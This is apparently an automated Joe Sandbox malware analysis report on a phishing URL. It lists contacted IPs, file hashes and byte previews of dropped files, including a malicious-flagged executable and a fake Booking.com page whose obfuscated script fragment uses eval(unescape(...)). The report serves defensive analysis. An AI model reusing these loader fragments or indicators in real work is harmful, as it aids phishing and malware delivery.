                        unknownReserved
                        unknownunknownfalse
                        142.250.181.68
                        www.google.comUnited States
                        15169GOOGLEUSfalse
                        172.217.21.35
                        unknownUnited States
                        15169GOOGLEUSfalse
                        35.190.80.1
                        a.nel.cloudflare.comUnited States
                        15169GOOGLEUSfalse
                        142.250.181.99
                        unknownUnited States
                        15169GOOGLEUSfalse
                        IP
                        192.168.2.16
                        127.0.0.1
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1566461
                        Start date and time:2024-12-02 08:52:53 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                        Sample URL:https://account.order129837129821.one
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:25
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • EGA enabled
                        Analysis Mode:stream
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal84.phis.win@35/12@23/179
                        • Exclude process from analysis (whitelisted): svchost.exe
                        • Excluded IPs from analysis (whitelisted): 216.58.208.227, 64.233.165.84, 172.217.17.46, 34.104.35.123
                        • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        Process:C:\Users\user\AppData\Local\Temp\downloaded.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Feb 7 13:56:56 2024, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                        Category:dropped
                        Size (bytes):2489
                        Entropy (8bit):3.644824735712954
                        Encrypted:false
                        SSDEEP:
                        MD5:DAC96114179BD0A147FD5AA31AC20D55
                        SHA1:9ADEBF62C102AB078CFC08297A17C93629E2BBF4
                        SHA-256:9F971BD472AC03345C7E096BB4B66341FF6DEAB104D286FE5EE594C4F07E4271
                        SHA-512:E76B1908898F8ED5FE4DEAF0E19E3F421F688E9EF1142BBA6D364F3D8EA8FF0B37DD721F4D13EA4B301CB56CA9B559DBE4A0DEF80982930904999508EFF7DEC5
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ......,.....3...Y.....q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGX!w....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VFW.H....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VFW.H....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VFW.E..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VGX.w..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.A.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n...-.-.l.o.a.d.-.e
                        Process:C:\Windows\System32\mshta.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10663
                        Entropy (8bit):6.120615852058954
                        Encrypted:false
                        SSDEEP:
                        MD5:7E486178B173CF383A5872103AAED304
                        SHA1:2F7D3A2E0ADD2FFB110720B9E172E2EEB1A7FAFA
                        SHA-256:361B65CEDAF5B340B8F7F5B85BE5EE6F2C644C76372B6E7B03443CB77F4D923B
                        SHA-512:705A90DB8104A0226F505451B62C4191DC39DBB4D9F7B9907E4DBE7A4D9E8784D438F652BB46616A014C504B3780FA845CA4C9C0E1763AA6898846EE54C2AEC5
                        Malicious:false
                        Reputation:unknown
                        Preview:<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><title>Booking.com</title><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><meta http-equiv='expires' content=''><script>l1l=document.documentMode||document.all;var b5d79f76=true;ll1=document.layers;lll=window.sidebar;b5d79f76=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');b5d79f76|=lII;zLP=location.protocol+'0FD';n6xv12YESk=new Array();h5CI5pKNf2=new Array();h5CI5pKNf2[0]='\143Hq%33\164\157%32%36%30\170%31%33\150%34%36';n6xv12YESk[0]='.<.h.t.m.l.>.\r.\n~za.e.a.d.>.<.s.c.r.i.p.t.>.e.v.a.l.(.u.n.e~..a.p.e.(.\'.v.\\.1.4.1~$.6.2.%.2.0~(~\'.1.7.1.%.3.7~3.D~+~5.2~5.3.B~..y~3.8~6~$.2.3.t.%.7.2.i.n.%.6~9.E.f~G~*.6.F.m.%.4.3.h~$~&~(~*~W.o.d.e~+~A.3~2.3.3~+.C~3~e.0~+.9~3.B.
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16268
                        Entropy (8bit):5.48452440555951
                        Encrypted:false
                        SSDEEP:
                        MD5:BE81B6535945515539A28B1E57FF6615
                        SHA1:01FA7A6A4FD302CFF3675CFCEE48CC74C1A1DFF7
                        SHA-256:A46AE3E9280D842FC482CDFCB3C06479A62771514B275C871D76CA0219656F76
                        SHA-512:9333DCE8673E17CCC049290BB7D02B2E0137C6521F7CE5B6204004ADC28E83CD9ECF58905754F68470071F14C8D701C1575B137711BCBB8F5485BB10EACA4DD0
                        Malicious:false
                        Reputation:unknown
                        Preview:@...e................................................@..........H...............o..b~.D.poM...C..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementD....................+.H..!...e........System.Configuration.Ins
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Reputation:unknown
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:PE32+ executable (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):1996800
                        Entropy (8bit):6.262750977116576
                        Encrypted:false
                        SSDEEP:
                        MD5:3AAD566F1E5EADD40727569F1C2A358D
                        SHA1:92A0AC5183AED376BE617EBF65550FE35A4D62B4
                        SHA-256:A63C622F3F447CC477B13E89E62C58F6A31B1D3FD9913CAB7F84A56E622A16C1
                        SHA-512:B269EDCE13980B1EB67AE2C5377BA3931A25C3336E8E57B52C74B85499C96F7D0CD7A76259B2846942EEC3BAF0D364987A4F056AB21EA9D5D9C01E06ED5992A4
                        Malicious:true
                        Reputation:unknown
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#d..B...B...B...:...B...:..TB.......B.......B.......B...:...B.......B...:...B...B...C......MB.......B.......B..Rich.B..................PE..d...kmLg.........."....*.n...x.......m.........@..........................................`..................................................{...............p..................4...@...........................(.......@...............p............................text....m.......n.................. ..`.rdata...............r..............@..@.data............R..................@....pdata.......p......................@..@.reloc..4............Z..............@..B................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\downloaded.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 09:48:42 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                        Category:dropped
                        Size (bytes):2603
                        Entropy (8bit):3.646100391282571
                        Encrypted:false
                        SSDEEP:
                        MD5:024E0D25157FC00DAF06E69D19EE3A6E
                        SHA1:D0325978C4940403D1007B2CC37FE5802A807609
                        SHA-256:AEB8332E15453272D419311647BA48D5E11AB649521D1CB8768AB1707D6985DB
                        SHA-512:375524B7BD9270B602839B6BABA57C46D9817989B265E5E6CE13C6DF09091350FA3FF774A1F24F8F4DFFCB3C02DF5DDFD05B3936785371743D9F835E3C760BC5
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ......,.....=.,.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....CW.V..PROGRA~1..t......O.ICW.V....B...............J.....p+j.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VCW.V....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VCW.V....M.....................G-..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VCW.V..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VCW.V..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.M.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 06:53:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2673
                        Entropy (8bit):3.98946486113944
                        Encrypted:false
                        SSDEEP:
                        MD5:AD73F2EA2FC6EA21CE06AEEA4E49B5CE
                        SHA1:887271CA89AFCFB7BC1E01C59AF717F320912901
                        SHA-256:2FF53658264598FB4363EB42D767588B138CB0AF43221B943AD8AB1B6F7B3501
                        SHA-512:F11E6C60EBD5B85203E6F46E7B235124D2F28E4FA040807C7444D4D05760D5667D7BAC81C6576573DD2E455D5122EAD0D57AAF9C8E24FD4E2E4A16E4C0208F81
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,.......D.D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 06:53:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2675
                        Entropy (8bit):4.00499861289025
                        Encrypted:false
                        SSDEEP:
                        MD5:E7297D5F90C026C3D79AECC791FB457D
                        SHA1:B957023EB2258C414B3C2945DFFB91BEA1E25A2A
                        SHA-256:145F8537620EB7E39FADE1120B6DCCFB136C10716367E17293A2290E541AD69E
                        SHA-512:631FAE04C38EB7BC181180D07EF9F3FFD658AC3CE7CD76BFB0CF8BE9CB22F56D7F7154443CF5832851B711F4F5075BEA2574FCE8A94152CA5A14C0193D0FB961
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,....1.D.D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2689
                        Entropy (8bit):4.014428209571006
                        Encrypted:false
                        SSDEEP:
                        MD5:C485E2BF74B6FAF95B52E143B1D6EF00
                        SHA1:7EB8AC7AC4EB90E82343DD3BBA35AF522EC3358C
                        SHA-256:F9C378258D428B80D802BE1725971E8F627F28CA47D664975946D8F65CDADFBB
                        SHA-512:06A15534C0574C57FB78B4623BB2F378C08916609F868E7DDECF53720A73E8EB324992B3BB802980F6423A998501A1ED2B8126F22BF7A44491A030DD2FE5B270
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 06:53:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2677
                        Entropy (8bit):4.005350831551929
                        Encrypted:false
                        SSDEEP:
                        MD5:67EB4F5BF6E21F3A926684E923A08A76
                        SHA1:6C92A15CE8180F5428ABB189FC1101BCA036E3A9
                        SHA-256:3534BD5C0627F209E43F7BFCC6D08BA51727DB816F3E661B6001FA152A6ED026
                        SHA-512:314C8866AF85FA0EDDCABDF1CFBB26D24ACCC9307FE228F47671613DB5DA202CC2239A74B09636C6792A7B81DBE1FABE9F89D592E88334E20A52B7E5C3302FB3
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,.......D.D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 06:53:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2677
                        Entropy (8bit):3.992853071689387
                        Encrypted:false
                        SSDEEP:
                        MD5:534B6D5D0EE22AEFB1BE1DE1BC4F953E
                        SHA1:590BA055C352FE472DEF0EEAF70394B8D47729E9
                        SHA-256:E376914F43B037CB22C278C512210C53C85C7DAB39A87C30ED75CBECF2A157C9
                        SHA-512:13759E0ED8F7C1EF6048CF51A73F1CC217A9F5AC8EADD0BC02DE15F1F61A37E539DE850508E65049ED5F1C9955BDFF27C0C16A284B35CB5AC4DAA7A7A54C5C74
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,.....F.D.D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 06:53:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2679
                        Entropy (8bit):4.002568817926521
                        Encrypted:false
                        SSDEEP:
                        MD5:5A2310A15A62660C35DAA7D0485E7965
                        SHA1:E561EE862DE76D6E5C6F889FCA9760761820F1E8
                        SHA-256:BE264E9ABBF505E36F575691C86F6E225962AAD4689B332ABC3D699285A06E56
                        SHA-512:67BEFB6CE13B963D70FC6FAA47C5057B9A71B5CAE4373B000AFF08FF4B1A3BECA519219B9A9F2C328D23D97698DFC311C27107CAD7A4833779AFD3AD40BDE9B2
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,.......D.D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        No static file info